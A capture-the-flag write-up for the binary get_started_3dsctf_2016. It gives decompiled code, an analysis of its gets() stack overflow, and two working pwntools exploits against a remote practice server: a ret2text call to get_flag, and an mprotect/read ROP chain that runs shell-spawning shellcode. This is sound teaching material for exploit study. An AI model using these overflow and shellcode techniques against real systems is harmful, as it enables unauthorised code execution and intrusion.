
get_started_3dsctf_2016

Environment: Ubuntu 16


0x01 Reconnaissance


checksec

[*] '/home/zelas/Desktop/pwn/get_started_3dsctf_2016/get_started_3dsctf_2016'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled // non-executable stack: shellcode placed in the overflowed buffer cannot run in place, so the routes below are ret2text (call get_flag) or mprotect() to make a data page executable
PIE: No PIE (0x8048000)

Statically linked (output of `file`) — libc routines such as exit(), mprotect() and read() are inside the binary at fixed addresses, so no libc leak is needed:

1
get_started_3dsctf_2016: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, not stripped

IDA decompilation

main()

// Decompiled by IDA. main() prompts for a "magic word" and reads it with
// gets(), which performs no bounds check, so input longer than 56 bytes runs
// off the end of v4 and over the saved frame / return address (no canary).
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4[56]; // [esp+4h] [ebp-38h] BYREF — 56 == 0x38 bytes below the frame base; this is the padding length used by both exploits

printf("Qual a palavrinha magica? ", v4[0]); // the format string has no conversion, so the extra argument is ignored (likely a decompiler artifact)
gets(v4); // unbounded read into a 56-byte stack buffer: the overflow primitive; gets() stops at '\n', so the payload must not contain 0x0a
return 0;
}

Suspicious function get_flag() — nothing in main() calls it, so it is dead code the exploit has to reach by overwriting main's return address:

// Decompiled by IDA. Prints flag.txt byte by byte, but only when both
// arguments equal fixed magic values. Since main() never calls it, both
// arguments must be supplied by the attacker on the faked stack frame.
void __cdecl get_flag(int a1, int a2)
{
int v2; // esi
unsigned __int8 v3; // al
int v4; // ecx
unsigned __int8 v5; // al

if ( a1 == 814536271 && a2 == 425138641 ) // 0x308CD64F and 0x195719D1; both come from the stack (cdecl: ebp+8 / ebp+12), so they are attacker-controlled
{
v2 = fopen("flag.txt", "rt"); // return value is not NULL-checked: with no flag.txt (e.g. local testing) getc(NULL) crashes
v3 = getc(v2);
if ( v3 != 255 ) // getc()'s EOF (-1) truncated to 8 bits is 0xFF, so the loop also stops early on a literal 0xFF byte in the file
{
v4 = (char)v3;
do
{
putchar(v4); // stdio-buffered; when stdout is a socket the bytes typically leave only on flush, which exit() performs — one reason to return into exit() rather than crash
v5 = getc(v2);
v4 = (char)v5;
}
while ( v5 != 255 );
}
fclose(v2);
}
}

// get_flag() is at 0x80489A0 — fixed, because the binary has no PIE

0x02 Approach


Approach 1: ret2text into get_flag()

1. Use the gets() overflow to overwrite main's return address with get_flag().

2. get_flag() has nowhere sensible to return: it was never called, so the return address it will pop is whatever we place after its own address. Set that slot to exit() so the process terminates cleanly; since the flag is written with putchar(), exiting through exit() also flushes stdout, whereas returning into garbage would likely crash before the buffered flag is sent.

v4 (buffer)        0x38 bytes of padding
ebp                0x4 — listed for completeness, but the working exploit below puts get_flag's address immediately after the 0x38 bytes; verify main's epilogue in the disassembler (or the crash offset under gdb) before reusing this layout on another build
ret                get_flag()
get_flag's ret     exit()
arg a1             0x308CD64F (a1 is read at ebp+8 of get_flag's frame, i.e. the dword after its return slot)
arg a2             0x195719D1 (ebp+12)

Approach 2: mprotect() + read() shellcode

1. The binary is statically linked, so mprotect() and read() are present even though main() never uses them. Return into mprotect(page, 0x1000, RWX) on a page-aligned, writable address in the binary's data region (0x80ea000), use a pop-pop-pop-ret gadget to discard the three arguments, then read() shellcode into that page and return to it. This bypasses NX without any leak.

0x03 Exploit


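from pwn import *

context(os='linux', arch='i386', log_level='debug')
# io = process(['get_started_3dsctf_2016'])
io = remote('node4.buuoj.cn', 29510)

# Overflow layout (see the stack table above): 0x38 bytes fill v4, then
# main's return slot. No PIE, so every address below is fixed.
padding = 0x38
get_flag = 0x80489A0   # get_flag(int a1, int a2)
exit_addr = 0x804E6A0  # exit(): used as get_flag's return address so the process
                       # ends cleanly and stdout (the putchar'd flag) is flushed
a1 = 0x308CD64F        # == 814536271, first magic value checked by get_flag
a2 = 0x195719D1        # == 425138641, second magic value

# Fake frame for get_flag: [ret -> exit][a1][a2]; cdecl reads the arguments
# at ebp+8 / ebp+12, i.e. the two dwords after the return slot.
payload = b'a' * padding + p32(get_flag) + p32(exit_addr) + p32(a1) + p32(a2)

# gets() stops at '\n' (0x0a); sendline() appends one, so the payload itself
# must not contain that byte or its tail would never be copied.
if b'\n' in payload:
    raise ValueError('payload contains 0x0a; gets() would truncate it')

io.sendline(payload)
# The original drained the reply with io.recv() and only showed it through
# debug logging; print the flag explicitly so it is not lost at other log
# levels. exit() closes the connection, so recvall() returns once it does.
flag = io.recvall(timeout=2)
print(flag.decode(errors='replace'))
io.close()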

exp2: mprotect() + read() shellcode

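from pwn import *

context(os='linux', arch='i386', log_level='debug')
q = remote('node4.buuoj.cn', 29510)
# q = process('./get_started_3dsctf_2016')

# Statically linked, no PIE: libc routines and gadgets live at fixed
# addresses inside the binary itself, so no leak is required.
mprotect = 0x0806EC80
read_addr = 0x0806E140
# pop edx; pop ecx; pop ebx; ret — clears mprotect's three arguments off the
# stack so the chain continues into read(). (0x0804f460 is another 3-pop gadget.)
pop_edx_ecx_ebx_ret = 0x0806fc30
buf = 0x80ea000        # page-aligned, writable address in the binary's data
                       # region; mprotect() requires page alignment
PAGE = 0x1000
RWX = 0x7              # PROT_READ | PROT_WRITE | PROT_EXEC
SHELLCODE_MAX = 0x100  # bytes read() will pull into buf

# Chain: main's ret -> mprotect(buf, PAGE, RWX); the pop3 gadget consumes the
# arguments; -> read(0, buf, SHELLCODE_MAX), whose return slot is buf itself,
# so execution lands on the freshly written, now-executable shellcode.
payload = b'a' * 56 + p32(mprotect) + p32(pop_edx_ecx_ebx_ret) + p32(buf) + p32(PAGE) + p32(RWX)
payload += p32(read_addr) + p32(buf) + p32(0) + p32(buf) + p32(SHELLCODE_MAX)

# gets() stops at '\n' (0x0a); the payload must not contain that byte.
if b'\n' in payload:
    raise ValueError('payload contains 0x0a; gets() would truncate it')

shellcode = asm(shellcraft.sh())
# sendline() appends '\n', which read() also stores; keep the total within
# the read() size or the shellcode is truncated.
if len(shellcode) + 1 > SHELLCODE_MAX:
    raise ValueError('shellcode longer than the read() size')

q.sendline(payload)
# Let gets() consume the first line before the shellcode is sent: if both
# lines arrive in one chunk, the second may be left in stdin's stdio buffer,
# where the raw read() syscall never sees it and the chain hangs.
sleep(1)
q.sendline(shellcode)
sleep(1)
q.interactive()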

